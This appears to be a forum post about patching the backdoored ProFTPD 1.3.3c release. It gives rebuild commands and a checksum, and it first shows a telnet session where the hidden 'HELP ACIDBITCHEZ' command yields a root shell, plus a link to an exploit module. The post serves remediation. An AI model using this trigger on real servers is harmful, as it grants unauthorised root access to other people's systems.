Hello,
I believe to patch this exploit to run the following command:
before that please check the version.txt
Regards.
Code:
$ telnet 0 21
Trying 0.0.0.0…
Connected to 0.
Escape character is ‘^]’.
220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [127.0.0.1]
HELP
214-The following commands are recognized (* =>’s unimplemented):
CWD XCWD CDUP XCUP SMNT* QUIT PORT PASV
EPRT EPSV ALLO* RNFR RNTO DELE MDTM RMD
XRMD MKD XMKD PWD XPWD SIZE SYST HELP
NOOP FEAT OPTS AUTH* CCC* CONF* ENC* MIC*
PBSZ* PROT* TYPE STRU MODE RETR STOR STOU
APPE REST ABOR USER PASS ACCT* REIN* LIST
NLST STAT SITE MLSD MLST
214 Direct comments to someone@somewhere
HELP ANOOP
502 Unknown command ‘ANOOP’
HELP a
502 Unknown command ‘A’
HELP ACIDBITCHEZ
id ;
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
Code:
http://packetstormsecurity.org/files/view/96316/proftpd_133c_backdoor.rb.txt
I believe to patch this exploit to run the following command:
Code:
cd /usr/local/directadmin/custombuild
./build update
./build clean
./build proftpd d
before that please check the version.txt
http://www.proftpd.org/md5_pgp.html
4f2c554d6273b8145095837913ba9e5d proftpd-1.3.3c.tar.gz
Regards.